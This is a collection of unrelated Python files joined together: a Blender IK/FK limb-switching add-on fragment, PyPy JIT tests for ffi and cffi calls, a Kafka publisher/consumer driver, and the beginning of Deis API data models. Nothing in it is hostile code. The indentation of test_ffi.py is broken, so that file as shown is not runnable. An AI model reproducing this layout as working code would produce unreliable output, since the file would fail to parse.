        else:
            self.previous = -999
def fktoik(index):
    """Switch limb `index` from FK to IK: snap the IK target to the current
    FK pose tail, enable the IK constraint, and keyframe the transition."""
    manageKeyFrame(index, True, -1)   # phase -1: key/mute the pre-switch state
    amt = Global.getAmtr()
    adjust_shin_y(index, True)
    my_bone = amt.pose.bones[bone_name[index]]
    ik_bone = amt.pose.bones[ik_name[index]]
    set_fk(get_influece_data_path(bone_name[index]))
    # NOTE(review): the OBJECT/POSE mode round-trip appears to force a pose
    # refresh before the matrices are read - confirm.
    Global.setOpsMode('OBJECT')
    Global.setOpsMode('POSE')
    ik_bone.matrix = set_translation(ik_bone.matrix, my_bone.tail)
    set_ik(get_influece_data_path(bone_name[index]))
    if index > 1:
        # Legs: also align the IK foot rotation and enable Copy Rotation.
        rot3 = Global.getFootAngle(index-2)
        for ridx, rot in enumerate(rot3):
            ik_bone.rotation_euler[ridx] = math.radians(rot)
        toFootCopyRotate(index, True)
    manageKeyFrame(index, True, 0)    # phase 0: key the post-switch state
    # Phase 1 (unmute, after my_service's 2s delay) runs off the main thread.
    if index == 0:
        t = threading.Thread(target=my_srv0_1)
        t.start()
    if index == 1:
        t = threading.Thread(target=my_srv1_1)
        t.start()
    if index == 2:
        t = threading.Thread(target=my_srv2_1)
        t.start()
    if index == 3:
        t = threading.Thread(target=my_srv3_1)
        t.start()
def toFootCopyRotate(index, flg_ik):
    """Toggle the foot's 'Copy Rotation' constraint for leg `index`
    (2 = right, 3 = left): full influence in IK mode, none in FK mode."""
    foot_names = ['', '', 'rFoot', 'lFoot']
    pbone = Global.getAmtr().pose.bones
    if pbone is None:
        return
    for constraint in pbone.get(foot_names[index]).constraints:
        if constraint.name == 'Copy Rotation':
            constraint.influence = 1.0 if flg_ik else 0.0
def my_service(index, flg_to_ik):
    """Deferred phase-1 of an IK/FK switch: wait 2 seconds, then unmute the
    F-curves muted by manageKeyFrame (runs on a worker thread)."""
    time.sleep(2)
    manageKeyFrame(index, flg_to_ik, 1)
# Parameterless wrappers so each (limb, direction) pair can be passed
# directly as a threading.Thread target. Suffix _1 = to IK, _0 = to FK;
# the digit is the limb index (0/1 hands, 2/3 shins).
def my_srv0_1():
    my_service(0, True)

def my_srv1_1():
    my_service(1, True)

def my_srv2_1():
    my_service(2, True)

def my_srv3_1():
    my_service(3, True)

def my_srv0_0():
    my_service(0, False)

def my_srv1_0():
    my_service(1, False)

def my_srv2_0():
    my_service(2, False)

def my_srv3_0():
    my_service(3, False)
def iktofk(index):
    """Switch limb `index` from IK to FK: snapshot the IK-driven pose,
    disable the IK constraint, replay the pose onto the FK chain, and
    keyframe the transition."""
    manageKeyFrame(index, False, -1)   # phase -1: key/mute the pre-switch state
    adjust_shin_y(index, False)
    amt = Global.getAmtr()
    ik_bone = amt.pose.bones[ik_name[index]]
    my_bone = amt.pose.bones[bone_name[index]]
    set_ik(get_influece_data_path(bone_name[index]))
    # NOTE(review): the OBJECT/POSE mode round-trip appears to force a pose
    # refresh before the matrices are read - confirm.
    Global.setOpsMode('OBJECT')
    Global.setOpsMode('POSE')
    ik_bone_matrixes = []
    # For legs, start the walk at the foot so its pose is captured too.
    if my_bone.name == 'lShin':
        my_bone = amt.pose.bones.get('lFoot')
    elif my_bone.name == 'rShin':
        my_bone = amt.pose.bones.get('rFoot')
    # Snapshot the chain's matrices while IK still drives it.
    it = my_bone
    for i in range(num_bones[index]+1):
        if it == None:
            # NOTE(review): `continue` leaves `it` None for the remaining
            # iterations, so the snapshot simply ends early - `break` was
            # probably intended; behavior is equivalent here.
            continue
        mx = deepcopy(it.matrix)
        ik_bone_matrixes.append(mx)
        it = it.parent
    set_fk(get_influece_data_path(bone_name[index]))
    if index > 1:
        toFootCopyRotate(index, False)
    # Replay the snapshot onto the now FK-driven chain, parent by parent.
    it = my_bone
    for i in range(num_bones[index] + 1):
        if it == None:
            continue
        it.matrix = deepcopy(ik_bone_matrixes[i])
        it = it.parent
    manageKeyFrame(index, False, 0)    # phase 0: key the post-switch state
    # Phase 1 (unmute, after my_service's 2s delay) runs off the main thread.
    if index == 0:
        t = threading.Thread(target=my_srv0_0)
        t.start()
    if index == 1:
        t = threading.Thread(target=my_srv1_0)
        t.start()
    if index == 2:
        t = threading.Thread(target=my_srv2_0)
        t.start()
    if index == 3:
        t = threading.Thread(target=my_srv3_0)
        t.start()
def bone_disp2(idx, pose_bone, amt_bone, flg_hide):
    """Resize one IK/pole control's custom shape and set its visibility.

    `idx` indexes a six-entry scale table built from CustomBones.hikfikpole
    (hands share entry 0, shins entry 1, poles entry 2).
    """
    hfp = CustomBones.hikfikpole
    scales = [hfp[i // 2] for i in range(6)]
    if amt_bone is None or pose_bone is None:
        return
    isAnim = Global.isExistsAnimation()
    # blender 3.0 break change:
    # Replaced PoseBone.custom_shape_scale scalar with a PoseBone.custom_shape_scale_xyz vector
    # (Versions.handle_custom_shape_scale abstracts over both).
    shrink = flg_hide and isAnim
    Versions.handle_custom_shape_scale(pose_bone, scales[idx] * 0.4 if shrink else scales[idx])
    # While an animation exists the controls stay visible regardless of flg_hide.
    amt_bone.hide = False if isAnim else flg_hide
def bone_disp(idx, flg_hide):
    """Show or hide the IK controller for limb `idx` (0-3); any
    out-of-range index applies the change to all four limbs."""
    if not 0 <= idx <= 3:
        for limb in range(4):
            bone_disp(limb, flg_hide)
        return
    abones = Global.getAmtrBones()
    pbones = Global.getAmtr().pose.bones
    name = ik_name[idx]
    if name in abones:
        bone_disp2(idx, pbones.get(name), abones.get(name), flg_hide)
    if idx > 1:
        # Legs also carry a pole target: e.g. 'rShin_IK' -> 'rShin_P'.
        pole = name[:-2] + 'P'
        if pole in abones:
            # Pole shapes use scale slots 4/5 (idx + 2) in bone_disp2.
            bone_disp2(idx + 2, pbones.get(pole), abones.get(pole), flg_hide)
# def bonerange_onoff(self):
# bonerange_onoff(self,bpy.contxt)
def bonerange_onoff(self, context):
    """Property-update callback: toggle bone rotation limits according to
    the window manager's br_onoff_prop checkbox."""
    Global.boneRotation_onoff(context, context.window_manager.br_onoff_prop)
# Per-checkbox property-update callbacks; Blender invokes them with
# (self, context), and each forwards to ifk_update with its limb index.
def ifk_update0(self, context):
    ifk_update(context, 0)

def ifk_update1(self, context):
    ifk_update(context, 1)

def ifk_update2(self, context):
    ifk_update(context, 2)

def ifk_update3(self, context):
    ifk_update(context, 3)
def ifk_update(context, idx):
    """Synchronize limb `idx`'s armature IK/FK state with its GUI checkbox.

    Called from the ifk_update0..3 property callbacks. Compares the IK
    constraint influence (> 0.5 means IK is active) with the window
    manager's `ifk<idx>` boolean and converts the limb when they disagree.
    Does nothing while `ik_access_ban` is set or no armature is loaded.
    """
    if Global.get_Amtr_name() == "" or ik_access_ban == True:
        return {'FINISHED'}
    if idx >= 0 and idx <= 3:
        ik_force = (get_ik_influence(get_influece_data_path(bone_name[idx])) > 0.5)
        # getattr replaces the original eval('context.window_manager.ifk<n>'):
        # same lookup, no dynamic code evaluation.
        gui_force = getattr(context.window_manager, 'ifk' + str(idx))
        if ik_force != gui_force:
            if ik_force == False:
                bone_disp(idx, False)
                fktoik(idx)
            else:
                bone_disp(idx, True)
                iktofk(idx)
    return {'FINISHED'}
def adjust_shin_y(idx, flg_ik):
    """Move the shin bone's head along Y to the mesh knee position for the
    requested mode (legs only: idx 2 = right, 3 = left).

    :param idx: limb index; values below 2 (arms) are ignored.
    :param flg_ik: True to use the IK knee vertex, False for the FK one.
    """
    if Global.getAmtr() is None or idx < 2:
        return
    idx = idx - 2
    bns = ['rShin', 'lShin']
    Global.setOpsMode('EDIT')
    mobj = Global.getBody()
    if mobj is None:
        Global.find_Both(Global.getAmtr())
        return
    vgs = mobj.data.vertices
    # Knee vertex ids, [[female ik, female fk], [male ik, male fk]].
    # NOTE(review): these look like fixed figure-mesh vertex indices - confirm.
    fm_ikfk = [[4708, 3418], [4428, 3217]]
    vidx = 0
    if Global.getIsMan():
        if flg_ik:
            vidx = fm_ikfk[1][0]
        else:
            vidx = fm_ikfk[1][1]
    else:
        if flg_ik:
            vidx = fm_ikfk[0][0]
        else:
            vidx = fm_ikfk[0][1]
    if Global.getIsGen():
        # Remap the vertex index for the Genesis variant of the mesh.
        vidx = Global.toGeniVIndex(vidx)
    Global.getAmtr().data.edit_bones[bns[idx]].head[1] = vgs[vidx].co[1]
    Global.setOpsMode('POSE')
    if flg_ik:
        # Presumably keeps the knees slightly bent so the IK solver bends
        # them the right way - TODO confirm.
        for i in range(2):
            s = Global.getAmtr().pose.bones.get(bns[i])
            if s is not None:
                if s.rotation_euler[0] <= 0.0:
                    s.rotation_euler[0] = 0.1
def gorl_update(self, context):
    """Property-update callback for the global/local switch: when it turns
    off, resync the ifk0-3 checkboxes from the current IK constraint
    influences (> 0.5 means the limb is IK-driven)."""
    w_mgr = context.window_manager
    if w_mgr.gorl_prop:
        return
    for i, bn in enumerate(bone_name):
        influence = get_ik_influence(get_influece_data_path(bn))
        setattr(w_mgr, 'ifk' + str(i), influence > 0.5)
test_ffi.py | import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
    """JIT trace check for a _rawffi.alt call: pow() from libm should
    compile down to a single call_release_gil in the traced loop.

    `main` runs under the PyPy being tested and self.run records its JIT
    log, so its source must stay stable.
    """
    from rpython.rlib.test.test_clibffi import get_libm_name
    def main(libm_name):
        try:
            from _rawffi.alt import CDLL, types
        except ImportError:
            sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
            return 0
        libm = CDLL(libm_name)
        pow = libm.getfunc('pow', [types.double, types.double],
                           types.double)
        i = 0
        res = 0
        while i < 300:
            tmp = pow(2, 3)  # ID: fficall
            res += tmp
            i += 1
        return pow.getaddr(), res
    #
    libm_name = get_libm_name(sys.platform)
    log = self.run(main, [libm_name])
    pow_addr, res = log.result
    assert res == 8.0 * 300
    # The loop-shape assertions below are currently disabled by this skip.
    py.test.skip("XXX re-optimize _ffi for the JIT?")
    loop, = log.loops_by_filename(self.filepath)
    if 'ConstClass(pow)' in repr(loop):  # e.g. OS/X
        pow_addr = 'ConstClass(pow)'
    assert loop.match_by_id('fficall', """
        guard_not_invalidated(descr=...)
        i17 = force_token()
        setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
        f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
        guard_not_forced(descr=...)
        guard_no_exception(descr=...)
    """ % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
    """The frame of a function wrapping an ffi call must stay virtual:
    only one new_with_vtable (the virtualref) may appear in the loop."""
    from rpython.rlib.test.test_clibffi import get_libm_name
    def main(libm_name):
        try:
            from _rawffi.alt import CDLL, types
        except ImportError:
            sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
            return 0
        libm = CDLL(libm_name)
        pow = libm.getfunc('pow', [types.double, types.double],
                           types.double)
        def mypow(a, b):
            return pow(a, b)
        i = 0
        res = 0
        while i < 300:
            tmp = mypow(2, 3)
            res += tmp
            i += 1
        return pow.getaddr(), res
    #
    libm_name = get_libm_name(sys.platform)
    log = self.run(main, [libm_name])
    pow_addr, res = log.result
    assert res == 8.0 * 300
    loop, = log.loops_by_filename(self.filepath)
    opnames = log.opnames(loop.allops())
    # we only force the virtualref, not its content
    assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
    """ffi calls must release the GIL: five threads each sleeping ~1s
    should finish in about 1s wall-clock, not 5s."""
    from rpython.rlib.clibffi import get_libc_name
    def main(libc_name, n):
        import time
        import os
        from threading import Thread
        #
        # Resolve a 1-second sleep call for the host platform.
        if os.name == 'nt':
            from _rawffi.alt import WinDLL, types
            libc = WinDLL('Kernel32.dll')
            sleep = libc.getfunc('Sleep', [types.uint], types.uint)
            delays = [0]*n + [1000]    # Sleep() takes milliseconds
        else:
            from _rawffi.alt import CDLL, types
            libc = CDLL(libc_name)
            sleep = libc.getfunc('sleep', [types.uint], types.uint)
            delays = [0]*n + [1]       # sleep() takes seconds
        #
        # n zero-delay calls warm up the JIT before the real sleep.
        def loop_of_sleeps(i, delays):
            for delay in delays:
                sleep(delay)  # ID: sleep
        #
        threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
        start = time.time()
        for i, thread in enumerate(threads):
            thread.start()
        for thread in threads:
            thread.join()
        end = time.time()
        return end - start
    log = self.run(main, [get_libc_name(), 200], threshold=150,
                   import_site=True)
    assert 1 <= log.result <= 1.5  # at most 0.5 seconds of overhead
    loops = log.loops_by_id('sleep')
    assert len(loops) == 1  # make sure that we actually JITted the loop
def test_ctypes_call(self):
    """Same frame-escape check for ctypes: a traced fabs() loop should
    allocate only the virtualref; the release-gil assertions are disabled
    by the skip below."""
    from rpython.rlib.test.test_clibffi import get_libm_name
    def main(libm_name):
        import ctypes
        libm = ctypes.CDLL(libm_name)
        fabs = libm.fabs
        fabs.argtypes = [ctypes.c_double]
        fabs.restype = ctypes.c_double
        x = -4
        i = 0
        while i < 300:
            x = fabs(x)
            x = x - 100
            i += 1
        return fabs._ptr.getaddr(), x
    libm_name = get_libm_name(sys.platform)
    log = self.run(main, [libm_name], import_site=True)
    fabs_addr, res = log.result
    assert res == -4.0
    loop, = log.loops_by_filename(self.filepath)
    ops = loop.allops()
    opnames = log.opnames(ops)
    assert opnames.count('new_with_vtable') == 1  # only the virtualref
    # Everything below is currently disabled by this skip.
    py.test.skip("XXX re-optimize _ffi for the JIT?")
    assert opnames.count('call_release_gil') == 1
    idx = opnames.index('call_release_gil')
    call = ops[idx]
    assert (call.args[0] == 'ConstClass(fabs)' or  # e.g. OS/X
            int(call.args[0]) == fabs_addr)
def test__ffi_struct(self):
    """_rawffi.alt struct field access should JIT to raw getfield/setfield
    operations; the trace assertions are disabled by the skip below."""
    def main():
        from _rawffi.alt import _StructDescr, Field, types
        fields = [
            Field('x', types.slong),
        ]
        descr = _StructDescr('foo', fields)
        struct = descr.allocate()
        i = 0
        while i < 300:
            x = struct.getfield('x')  # ID: getfield
            x = x+1
            struct.setfield('x', x)  # ID: setfield
            i += 1
        return struct.getfield('x')
    #
    log = self.run(main, [])
    # Everything below is currently disabled by this skip.
    py.test.skip("XXX re-optimize _ffi for the JIT?")
    loop, = log.loops_by_filename(self.filepath)
    assert loop.match_by_id('getfield', """
        guard_not_invalidated(descr=...)
        i57 = getfield_raw(i46, descr=<FieldS dynamic 0>)
    """)
    assert loop.match_by_id('setfield', """
        setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
    """)
def test__cffi_call(self):
    """JIT trace check for a _cffi_backend call: ldexp() from libm should
    compile to a single call_release_gil in the traced loop."""
    from rpython.rlib.test.test_clibffi import get_libm_name
    def main(libm_name):
        try:
            import _cffi_backend
        except ImportError:
            sys.stderr.write('SKIP: cannot import _cffi_backend\n')
            return 0
        libm = _cffi_backend.load_library(libm_name)
        BDouble = _cffi_backend.new_primitive_type("double")
        BInt = _cffi_backend.new_primitive_type("int")
        BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
        ldexp = libm.load_function(BPow, 'ldexp')
        i = 0
        res = 0
        while i < 300:
            tmp = ldexp(1, 3)  # ID: cfficall
            res += tmp
            i += 1
        BLong = _cffi_backend.new_primitive_type("long")
        ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
        return ldexp_addr, res
    #
    libm_name = get_libm_name(sys.platform)
    log = self.run(main, [libm_name])
    ldexp_addr, res = log.result
    assert res == 8.0 * 300
    loop, = log.loops_by_filename(self.filepath)
    assert loop.match_by_id('cfficall', """
        p96 = force_token()
        setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
        f97 = call_release_gil(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
        guard_not_forced(descr=...)
        guard_no_exception(descr=...)
    """, ignore_ops=['guard_not_invalidated'])
    def test__cffi_call_c_int(self):
        """The JIT must sign-extend the C 'int' result of a cffi call: on
        64-bit platforms an int_signext(i97, 4) follows the call."""
        if sys.platform == 'win32':
            py.test.skip("not tested on Windows (this test must pass on "
                         "other platforms, and it should work the same way)")
        def main():
            import os
            try:
                import _cffi_backend
            except ImportError:
                sys.stderr.write('SKIP: cannot import _cffi_backend\n')
                return 0
            libc = _cffi_backend.load_library(None)
            BInt = _cffi_backend.new_primitive_type("int")
            BClose = _cffi_backend.new_function_type([BInt], BInt)
            _dup = libc.load_function(BClose, 'dup')
            i = 0
            fd0, fd1 = os.pipe()
            while i < 300:
                tmp = _dup(fd0)   # ID: cfficall
                os.close(tmp)
                i += 1
            os.close(fd0)
            os.close(fd1)
            BLong = _cffi_backend.new_primitive_type("long")
            return 42
        #
        log = self.run(main, [])
        assert log.result == 42
        loop, = log.loops_by_filename(self.filepath)
        # sys.maxint > 2**32 distinguishes 64-bit from 32-bit builds (py2)
        if sys.maxint > 2**32:
            extra = "i98 = int_signext(i97, 4)"
        else:
            extra = ""
        assert loop.match_by_id('cfficall', """
            p96 = force_token()
            setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
            i97 = call_release_gil(91, i59, i50, descr=<Calli 4 i EF=7 OS=62>)
            guard_not_forced(descr=...)
            guard_no_exception(descr=...)
            %s
        """ % extra, ignore_ops=['guard_not_invalidated'])
    def test__cffi_call_size_t(self):
        """An unsigned size_t result must be converted back to a Python long
        via fromrarith_int__r_uint after the raw call."""
        if sys.platform == 'win32':
            py.test.skip("not tested on Windows (this test must pass on "
                         "other platforms, and it should work the same way)")
        def main():
            import os
            try:
                import _cffi_backend
            except ImportError:
                sys.stderr.write('SKIP: cannot import _cffi_backend\n')
                return 0
            libc = _cffi_backend.load_library(None)
            BInt = _cffi_backend.new_primitive_type("int")
            BSizeT = _cffi_backend.new_primitive_type("size_t")
            BChar = _cffi_backend.new_primitive_type("char")
            BCharP = _cffi_backend.new_pointer_type(BChar)
            BWrite = _cffi_backend.new_function_type([BInt, BCharP, BSizeT],
                                                     BSizeT)  # not signed here!
            _write = libc.load_function(BWrite, 'write')
            i = 0
            fd0, fd1 = os.pipe()
            buffer = _cffi_backend.newp(BCharP, 'A')
            while i < 300:
                tmp = _write(fd1, buffer, 1)   # ID: cfficall
                assert tmp == 1
                assert os.read(fd0, 2) == 'A'
                i += 1
            os.close(fd0)
            os.close(fd1)
            return 42
        #
        log = self.run(main, [])
        assert log.result == 42
        loop, = log.loops_by_filename(self.filepath)
        assert loop.match_by_id('cfficall', """
            p96 = force_token()
            setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
            i97 = call_release_gil(91, i59, i10, i12, 1, descr=<Calli . iii EF=7 OS=62>)
            guard_not_forced(descr=...)
            guard_no_exception(descr=...)
            p98 = call(ConstClass(fromrarith_int__r_uint), i97, descr=<Callr . i EF=4>)
            guard_no_exception(descr=...)
        """, ignore_ops=['guard_not_invalidated'])
    def test_cffi_call_guard_not_forced_fails(self):
        # this is the test_pypy_c equivalent of
        # rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
        #
        # it requires cffi to be installed for pypy in order to run
        def main():
            import sys
            try:
                import cffi
            except ImportError:
                sys.stderr.write('SKIP: cannot import cffi\n')
                return 0

            ffi = cffi.FFI()

            ffi.cdef("""
                typedef void (*functype)(int);
                int foo(int n, functype func);
            """)

            lib = ffi.verify("""
                #include <signal.h>
                typedef void (*functype)(int);

                int foo(int n, functype func) {
                    if (n >= 2000) {
                        func(n);
                    }
                    return n*2;
                }
            """)

            @ffi.callback("functype")
            def mycallback(n):
                if n < 5000:
                    return
                # make sure that guard_not_forced fails
                # (walking the frame stack forces all virtualizables)
                d = {}
                f = sys._getframe()
                while f:
                    d.update(f.f_locals)
                    f = f.f_back

            n = 0
            while n < 10000:
                res = lib.foo(n, mycallback)  # ID: cfficall
                # this is the real point of the test: before the
                # refactor-call_release_gil branch, the assert failed when
                # res == 5000
                assert res == n*2
                n += 1
            return n

        log = self.run(main, [], import_site=True,
                       discard_stdout_before_last_line=True)  # <- for Win32
        assert log.result == 10000
        loop, = log.loops_by_id('cfficall')
        assert loop.match_by_id('cfficall', """
            ...
            f1 = call_release_gil(..., descr=<Calli 4 ii EF=7 OS=62>)
            ...
        """)
    def test__cffi_bug1(self):
        """Regression test: calling the same cffi function first with a float
        and then with an int argument must not crash the JIT."""
        from rpython.rlib.test.test_clibffi import get_libm_name
        def main(libm_name):
            try:
                import _cffi_backend
            except ImportError:
                sys.stderr.write('SKIP: cannot import _cffi_backend\n')
                return 0
            libm = _cffi_backend.load_library(libm_name)
            BDouble = _cffi_backend.new_primitive_type("double")
            BSin = _cffi_backend.new_function_type([BDouble], BDouble)
            sin = libm.load_function(BSin, 'sin')
            def f(*args):
                for i in range(300):
                    sin(*args)
            f(1.0)
            f(1)
        #
        libm_name = get_libm_name(sys.platform)
        self.run(main, [libm_name])
        # assert did not crash
    def test_cffi_init_struct_with_list(self):
        """Initializing a cffi struct from a list in a hot loop: the trace
        should be a single raw malloc plus three 2-byte raw stores, with the
        short fields sign-extension-checked via int_signext."""
        def main(n):
            import sys
            try:
                import cffi
            except ImportError:
                sys.stderr.write('SKIP: cannot import cffi\n')
                return 0

            ffi = cffi.FFI()
            ffi.cdef("""
            struct s {
                short x;
                short y;
                short z;
            };
            """)

            for i in xrange(n):
                ffi.new("struct s *", [i, i, i])

        log = self.run(main, [300])
        loop, = log.loops_by_filename(self.filepath)
        assert loop.match("""
        i161 = int_lt(i160, i43)
        guard_true(i161, descr=...)
        i162 = int_add(i160, 1)
        setfield_gc(p22, i162, descr=<FieldS pypy.module.__builtin__.functional.W_XRangeIterator.inst_current .>)
        guard_not_invalidated(descr=...)
        p163 = force_token()
        p164 = force_token()
        p165 = getarrayitem_gc(p67, 0, descr=<ArrayP .>)
        guard_value(p165, ConstPtr(ptr70), descr=...)
        p166 = getfield_gc(p165, descr=<FieldP pypy.objspace.std.dictmultiobject.W_DictMultiObject.inst_strategy .+>)
        guard_value(p166, ConstPtr(ptr72), descr=...)
        p167 = call(ConstClass(_ll_0_alloc_with_del___), descr=<Callr . EF=5>)
        guard_no_exception(descr=...)
        i112 = int_signext(i160, 2)
        setfield_gc(p167, ConstPtr(ptr85), descr=<FieldP pypy.module._cffi_backend.cdataobj.W_CData.inst_ctype .+>)
        i114 = int_ne(i160, i112)
        guard_false(i114, descr=...)
        --TICK--
        i119 = call(ConstClass(_ll_1_raw_malloc_varsize__Signed), 6, descr=<Calli . i EF=5 OS=110>)
        raw_store(i119, 0, i160, descr=<ArrayS 2>)
        raw_store(i119, 2, i160, descr=<ArrayS 2>)
        raw_store(i119, 4, i160, descr=<ArrayS 2>)
        setfield_gc(p167, i119, descr=<FieldU pypy.module._cffi_backend.cdataobj.W_CData.inst__ptr .+>)
        i123 = arraylen_gc(p67, descr=<ArrayP .>)
        jump(..., descr=...)
        """)
|
driver.py | from appl.kafka_interface import TopicConsumer, TopicPublisher
import sys
import threading
import traceback
import logging
LOG = logging.getLogger("root")
# Constants
bootstrap_servers = '127.0.0.1:9092'
kafka_conf = {"bootstrap.servers": bootstrap_servers}
class ApplicationState:
    """Shared handle on the running publisher/consumer objects and their
    worker threads, populated once start-up succeeds."""

    def __init__(self):
        # Everything starts unset; filled in later via set().
        self.set(None, None, None, None)

    def set(self, publisher, consumers, t_pub, t_consumers):
        """Record the live publisher/consumers and the threads running them."""
        self.publisher = publisher
        self.consumers = consumers
        self.pub_thread = t_pub
        self.con_threads = t_consumers
def wait_for_threads_to_join(app_state):
    """Block until the publisher thread and every consumer thread finish."""
    app_state.pub_thread.join()
    for consumer_thread in app_state.con_threads:
        consumer_thread.join()
def add_neighbors_for_ring_topology(consumers, partition_count):
    """Give each consumer exactly one neighbor (its successor's model),
    closing the chain into a ring."""
    LOG.debug("Using ring topology")
    for idx in range(1, partition_count):
        consumers[idx - 1].set_neighbors([consumers[idx].model])
    # The last consumer points back at the first to close the ring.
    consumers[partition_count - 1].set_neighbors([consumers[0].model])
def add_neighbors_for_fully_connected_topology(consumers, partition_count):
    """Give every consumer the models of all other consumers (full mesh)."""
    LOG.debug("Using fully-connected topology")
    for idx in range(partition_count):
        peers = [consumers[j].model
                 for j in range(partition_count) if j != idx]
        consumers[idx].set_neighbors(peers)
def start_publisher_and_consumers(topic,
                                  partition_count,
                                  dataset_location,
                                  application_state,
                                  topology=None,
                                  step=50,
                                  end=None):
    """Create the topic publisher and one consumer per partition, wire the
    requested topology ("ring" or "fcg"), and start everything on background
    threads.

    The live objects and threads are recorded on ``application_state`` so the
    caller can later wait on them. Failures are printed to stdout (best
    effort) rather than propagated.
    """
    try:
        publisher = TopicPublisher(topic, partition_count, dataset_location, kafka_conf, step)
        publisher.init_kafka_env()
        # BUG FIX: the original passed target=publisher.publish(), which
        # *called* publish() synchronously here and handed the thread a None
        # target. Pass the bound method so publishing runs on the thread.
        t_pub = threading.Thread(target=publisher.publish)
        t_pub.name = 'publisher'
        consumers = []
        t_consumers = []
        # partition numbers start with 0
        for i in range(0, partition_count):
            con = TopicConsumer("test-group-{}".format(i + 1), topic, i, bootstrap_servers, step, end, i + 1, partition_count, topology)
            consumers.append(con)
        if topology == "ring":
            add_neighbors_for_ring_topology(consumers, partition_count)
        elif topology == "fcg":
            add_neighbors_for_fully_connected_topology(consumers, partition_count)
        else:
            LOG.info("No topology configured")
        t_pub.start()
        for i in range(0, partition_count):
            t_con = threading.Thread(target=consumers[i].consume)
            t_con.name = consumers[i].get_group_id()
            t_con.start()
            t_consumers.append(t_con)
        application_state.set(publisher, consumers, t_pub, t_consumers)
    except Exception:
        traceback.print_exc(file=sys.stdout)
|
models.py | # -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import base64
from datetime import datetime
import etcd
import importlib
import logging
import re
import time
from threading import Thread
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError, SuspiciousOperation
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from docker.utils import utils as dockerutils
from json_field.fields import JSONField
from OpenSSL import crypto
import requests
from rest_framework.authtoken.models import Token
from api import fields, utils, exceptions
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def close_db_connections(func, *args, **kwargs):
    """
    Decorator to explicitly close db connections during threaded execution

    Note this is necessary to work around:
    https://code.djangoproject.com/ticket/22420
    """
    from functools import wraps

    # FIX: preserve the wrapped function's metadata (__name__, __doc__) so
    # logging and debugging show the real function, not _close_db_connections.
    @wraps(func)
    def _close_db_connections(*args, **kwargs):
        ret = None
        try:
            ret = func(*args, **kwargs)
        finally:
            # always close every connection so the worker thread leaks none
            from django.db import connections
            for conn in connections.all():
                conn.close()
        return ret
    return _close_db_connections
def log_event(app, msg, level=logging.INFO):
    """Log *msg* both to the controller's logger and to the app's own log."""
    # controller needs to know which app this log comes from
    logger.log(level, "{}: {}".format(app.id, msg))
    app.log(msg, level)
def validate_base64(value):
    """Check that value contains only valid base64 characters."""
    try:
        # The value is expected to look like "<type> <base64-blob> [comment]"
        # (e.g. an SSH public key); decode the second field to prove it is
        # well-formed base64. Any failure (including a missing field) is
        # reported as a ValidationError.
        encoded = value.split()[1]
        base64.b64decode(encoded)
    except Exception as e:
        raise ValidationError(e)
def validate_id_is_docker_compatible(value):
    """
    Check that the ID follows docker's image name constraints
    """
    # docker image names only allow lowercase alphanumerics and dashes
    if re.match(r'^[a-z0-9-]+$', value) is None:
        raise ValidationError("App IDs can only contain [a-z0-9-].")
def validate_app_structure(value):
    """Error if the dict values aren't ints >= 0."""
    # FIX: replaced Python-2-only syntax ("except ValueError, err" and
    # dict.viewvalues()) with forms valid on both Python 2.6+ and Python 3;
    # behavior is unchanged.
    try:
        if any(int(v) < 0 for v in value.values()):
            raise ValueError("Must be greater than or equal to zero")
    except ValueError as err:
        # surface the problem as a form/field validation error
        raise ValidationError(err)
def validate_reserved_names(value):
    """A value cannot use some reserved names."""
    # DEIS_RESERVED_NAMES is a blacklist of app names defined in settings
    if value in settings.DEIS_RESERVED_NAMES:
        raise ValidationError('{} is a reserved name.'.format(value))
def validate_comma_separated(value):
    """Error if the value doesn't look like a list of hostnames or IP addresses
    separated by commas.
    """
    # one pass over the whole string: letters, digits, dashes, dots, commas
    if re.search(r'^[a-zA-Z0-9-,\.]+$', value) is None:
        raise ValidationError(
            "{} should be a comma-separated list".format(value))
def validate_domain(value):
    """Error if the domain contains unexpected characters."""
    # only letters, digits, dashes and dots are acceptable in a domain
    if re.search(r'^[a-zA-Z0-9-\.]+$', value) is None:
        raise ValidationError('"{}" contains unexpected characters'.format(value))
def validate_certificate(value):
    """Error unless the value is a loadable PEM-encoded certificate."""
    try:
        crypto.load_certificate(crypto.FILETYPE_PEM, value)
    except crypto.Error as e:
        raise ValidationError('Could not load certificate: {}'.format(e))
def get_etcd_client():
    """Return a process-wide etcd client, or None if the cluster is
    unreachable.

    The client (or the None failure marker) is memoized as an attribute on
    the function object itself, so the connection attempt happens only once.
    """
    if not hasattr(get_etcd_client, "client"):
        # wire up etcd publishing if we can connect
        try:
            get_etcd_client.client = etcd.Client(
                host=settings.ETCD_HOST,
                port=int(settings.ETCD_PORT))
            # probe the cluster now so connection failures surface here
            get_etcd_client.client.get('/deis')
        except etcd.EtcdException:
            logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
            get_etcd_client.client = None
    return get_etcd_client.client
class AuditedModel(models.Model):
    """Add created and updated fields to a model."""
    # created: set once when the row is inserted (auto_now_add)
    created = models.DateTimeField(auto_now_add=True)
    # updated: refreshed on every save() (auto_now)
